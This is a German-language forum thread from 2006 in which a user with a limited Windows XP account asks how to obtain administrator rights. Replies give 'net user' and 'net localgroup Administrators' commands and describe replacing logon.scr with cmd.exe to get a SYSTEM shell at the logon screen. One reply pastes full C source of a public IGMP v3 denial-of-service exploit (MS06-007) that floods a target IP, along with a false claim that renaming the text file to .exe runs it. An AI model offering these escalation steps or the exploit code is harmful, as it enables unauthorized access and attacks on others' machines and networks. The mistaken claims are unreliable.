Win XP Benutzerkonten

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Elron McBong, 18. September 2006 .

Schlagworte:
  1. 18. September 2006
    Halle Leuz

    ich hab mal ne frage. Ich hab mal irgentwas gelesen, dass man sich, wenn man mit einem Eingeschränktem konto eingeloggt ist in Win Xp sich irgentwie über das cmd Admin rechte machen kann und admin auf dem pc sein. Ich finde nur leider das tut weder in google noch in rr. Wisst ihr wie das geht oder hat jemand ein tut?
    Für sinvolle Beiträge gibts gute Bewertung
    mfg Elron_McBong
     
  2. 18. September 2006
    AW: Win XP Benutzerkonten

    ja es gibt das "GetAd" local exploit... einfach mal nach googlen

    greez myth
     
  3. 18. September 2006
    AW: Win XP Benutzerkonten

    find ich net wirklich was ich hab gehört das das mit der cmd geht mit irgentwelchen befehlen
     
  4. 18. September 2006
    AW: Win XP Benutzerkonten

    hmm joa dieser "irgendein cmd-befehl" ist das exploit dass über die cmd gestartet wird.

    link: GetAd, NetDDE Exploit Code (WM_COPYDATA)

    allerdings musste ich gerade feststellen dass das unter xp nicht mehr funktioniert... sorry

    greez myth
     
  5. 19. September 2006
    AW: Win XP Benutzerkonten

    Haste es schon mal mit "net user Name Passwort /ad" (Name und PW selbst wählen) und danach "net localgroup Administrators Name /ad" (Hier musste den Namen angeben den Du oben auch angegeben hast) probiert? Weiss nicht ob es klappt aber einen versuch wäre es wert...

    Gruss
     
  6. 20. September 2006
    AW: Win XP Benutzerkonten

    es erstellt zwar neue konten aber ich bin nicht admin im neuen konto und kann es auch nicht als eingeschränkter nutzer machen
     
  7. 20. September 2006
    AW: Win XP Benutzerkonten

    also ich hab hier was von milw0rm geht bei allen XP+2003 (Xp geht auf jeden fall 2003 stehl mal drann)
    Code:
    #include <stdio.h>
    #include <winsock2.h>
    
    
    #pragma comment(lib, "Ws2_32.lib")
    
    typedef struct iphdr
    {
    
     unsigned char verlen; // IP version & length
     unsigned char tos; // Type of service
     unsigned short total_len; // Total length of the packet
     unsigned short ident; // Unique identifier
     unsigned short frag_and_flags; // Flags
     unsigned char ttl; // Time to live
     unsigned char proto; // Protocol (TCP, UDP etc)
     unsigned short checksum; // IP checksum
     unsigned int sourceIP; // Source IP
     unsigned int destIP; // Destination IP
     unsigned short options[2];
    
    } IPHEADER;
    
    
    
    
    typedef struct igmphdr {
     unsigned char type;
     unsigned char code;
     unsigned short checksum;
     unsigned long group;
     unsigned char ResvSQVR;
     unsigned char QQIC;
     unsigned short num;
     unsigned long addes;
    
     } IGMPHEADER;
    
    
    
    
    
    
    USHORT checksum(USHORT *buffer, int size)
    {
     unsigned long cksum=0;
    
     while (size > 1) {
     cksum += *buffer++;
     size -= sizeof(USHORT);
     }
    
     if (size)
     cksum += *(UCHAR*)buffer;
    
     cksum = (cksum >> 16) + (cksum & 0xffff);
     cksum += (cksum >>16);
    
     return (USHORT)(~cksum);
    }
    
    int sendIGMP(char* a, char* b)
    {
    
    
     unsigned int dst_addr, src_addr;
    
     IPHEADER ipHeader;
     IGMPHEADER igmpHeader;
    
    
    
     dst_addr=inet_addr (b);
     src_addr=inet_addr (a);
    
    
     char szSendBuf[60]={0};
     int rect;
    
     WSADATA WSAData;
     if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
     return FALSE;
    
     SOCKET sock;
     if ((sock = WSASocket(AF_INET,SOCK_RAW,
     IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
     printf("Create socket error");
     WSACleanup();
     return FALSE;
     }
    
    
     BOOL flag=TRUE;
     if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) ==
    SOCKET_ERROR) {
     printf("Set options error");
     closesocket(sock);
     WSACleanup();
     return FALSE;
     }
    
    
    
     SOCKADDR_IN ssin;
     memset(&ssin, 0, sizeof(ssin));
     ssin.sin_family=AF_INET;
     ssin.sin_port=htons(99);
     ssin.sin_addr.s_addr=dst_addr;
    
    
     ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
    
    
     ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));
    
    
     ipHeader.ident=htons(0);
    
     ipHeader.frag_and_flags=0;
    
     ipHeader.ttl=128;
     ipHeader.proto=IPPROTO_IGMP;
    
     ipHeader.checksum=0;
    
    
     ipHeader.tos=0;
    
     ipHeader.destIP=dst_addr;
     ipHeader.sourceIP=src_addr;
    
     //Ip options
     ipHeader.options[0]=htons(0x0000); //bug is here =)
     ipHeader.options[1]=htons(0x0000);
    
    
     igmpHeader.type=0x11; //v3 Membership Query
     igmpHeader.code=5;
     igmpHeader.num=htons(1);
     igmpHeader.ResvSQVR=0x0;
     igmpHeader.QQIC=0;
     igmpHeader.group=inet_addr("0.0.0.0");
     igmpHeader.addes=dst_addr;
    
     igmpHeader.checksum=0;
    
    
     memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));
    
     igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));
    
     memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
     memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
     memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);
    
     ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf,
    sizeof(ipHeader)+sizeof(igmpHeader)));
    
     memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
    
    
     rect=sendto(sock, szSendBuf,
    sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
    
     if (rect==SOCKET_ERROR) {
     printf("Send error: <%d>\n",WSAGetLastError());
     closesocket(sock);
     WSACleanup();
     return 0;
     }
    
    
    
     closesocket(sock);
     WSACleanup();
    
    
    
    return 1;
    
    
    }
    
    
    
    main(int argc, char **argv)
    {
    
    
     if(argc<2)
     {
     printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
     printf("Usage:\n");
     printf("c:\\igmps.exe <target ip> <source ip>\n\n");
     exit(0);
     }
    
    
     sendIGMP(argv[2], argv[1]);
    
    
     return 0;
    }
    
    also wenn du des in ne *.txt machst und dann exe dahinter schreibst musst nur en doppel klick machen dann gibts keine eingeschrenkten konten mehr und man kann auch keine mehr erstellen
    und da müsst auch noch en fehler von Xp kommen

    ich weis des mit der exe dahinter schreiben geht irgendwie anders aber ich bin nur en script kiddy

    MfG
    hackmanner
     
  8. 20. September 2006
    AW: Win XP Benutzerkonten

    ähm...
    1. musste das compilen und kannst ned einfach txt => exe machen (script kiddie triffts genau -.-) und
    2. IGMP v3 DoS Exploit (MS06-007) => wer weiss was DoS bedeutet kriegt nen keks -.-
     
  9. 21. September 2006
    AW: Win XP Benutzerkonten

    also ich bin noch auf der suche nach diesem Ausführen befehl.... aber auch nur weil ich weiß das es sowas mal gab bzw. gibt (glaub ich zumindest)^^

    derweil kannst du auch noch versuchen: hat er kein admin passwort
    geht folgendes.... wenn der anmeldebildschirm kommt wo du die konnten auswählen kannst drücke 2 mal alt+strg+entf und gebe beim benutzer "Administrator" ein und lass das kennwort feld leer....

    ein versuch is es wert^^

    wenn ich den befehl gefunden habe (falls es ihn noch gibt) poste ich ihn...

    mfg
     
  10. 21. September 2006
    AW: Win XP Benutzerkonten

    ok hab den befehl gefunden... zumindes war es der befehl den ich von damals kenn....

    ob´s geht? ka, versuch dein glück:

    "control userpasswords2"

    mfg
     
  11. 21. September 2006
    AW: Win XP Benutzerkonten

    jaja ich weis was dos is aber des mit dem txt->exe funzt des wegen lass ich des mit dem compiler warum extra was machen wenns doch geht (wenn du mir net glaubst dass des geht dann probiers halt mal aus)

    MfG
    hackmanner


    //:EDIT ich will ja net zu viel spamen des wegen edit ich des noch

    also ich hat mal aus probiert und des ging
    probiers halt auch aus
    ich hat ja geschrieben dass ich weis dass man des normal mim compiler machen muss
     
  12. 21. September 2006
    AW: Win XP Benutzerkonten

    Du bist also der festen Überzeugung, dass wenn ich Quelltext inne Textdatei haue und anstatt .txt einfach .exe dranschreibe, dass das ne ausführbare Datei wird ?

    LOOOOOL

    Compiler – Wikipedia
     
  13. 22. September 2006
    AW: Win XP Benutzerkonten

    Wenn du Rechte auf C:\ hast und Dateien löschen oder verändern kannst dann kopiere die Datei C:\Windows\System32\Logon.scr irgendwohin. Kopiere außerdem die datei C:\Windows\System32\cmd.exe irgendwoanders hin.

    Dann benennst du die cmd.exe in logon.scr um und ersetzt die bereits vorhandene datei unter C:\Windows\System32\

    Danach stellst du (falls nicht schon auf Standard) den Windows Bildschirmschoner auf "Windows XP", meldest dich ab, wartest ne Weile beim Logon, und nachdem die Zeit fürn Bildschirmschoner abgelaufen ist, öffnet sich ne cmd mit vollen Admin Rechten.

    dann einfach wie schon geschrieben wurde mit "net user NAME PASSWORT /add" und
    "net localgroup Administratoren BENUTZERNAME /add"

    dir n Benutzer anlegen und zu Gruppe admins adden. So jetzt kannst dich mit dem Benutzer anmelden. Wahrscheinlich wirst jedoch keine ausreichenden Rechte auf C:\ haben um die logon.scr zu ersetzen.

    Ansonsten nach local Exploits suchen.
     
  14. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.